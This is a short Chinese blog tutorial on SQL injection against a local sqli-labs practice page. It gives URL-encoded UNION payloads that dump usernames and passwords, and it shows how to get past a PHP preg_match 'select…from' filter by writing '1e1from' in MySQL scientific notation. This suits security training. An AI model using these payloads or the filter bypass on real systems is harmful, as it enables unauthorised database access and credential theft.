当前位置:网站首页>绕过正则实现SQL注入

绕过正则实现SQL注入

2022-08-02 14:03:00 H2223

 

 %27是'        %20是空格        --+是为了将后面的代码注释掉

首先使用order by 来查看有多少列

?id=1%27%20order%20by%204--+ 发现4报错了,改成3后就恢复了,说明有3列

联合查询1,2,3

?id=-1%27%20union%20select%201,2,3--+

 发现数据出在2,3上了

只要输入查询语句就可以获得所有数据

 注入语句:http://127.0.0.1/sql/less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)from%20users),3--+

 但在php文件中加入过滤正则

if (preg_match('/select\b[\s\S]*\bfrom/is',$id)){
	die('sql injection');
}

 被正则表达式捕获了

该正则表达式匹配了select后与form前的单词边界,select和from中间的所有字符

但sql注入要查询数据必须要有select与from,想要绕过正则表达式就要select后或form前有字符

 

 这样是匹配不上了,但是SQL语法也错了

mysql是支持科学计数法的(1e1)

 

这样既可以绕开正则又不会语法错误

http://127.0.0.1/sql/less-1/?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),1e1from%20users--+

 

 注意1e1会让表格多一列,所以要把3去掉

原网站

版权声明
本文为[H2223]所创,转载请带上原文链接,感谢
https://blog.csdn.net/H2223/article/details/125946801

边栏推荐

猜你喜欢

随机推荐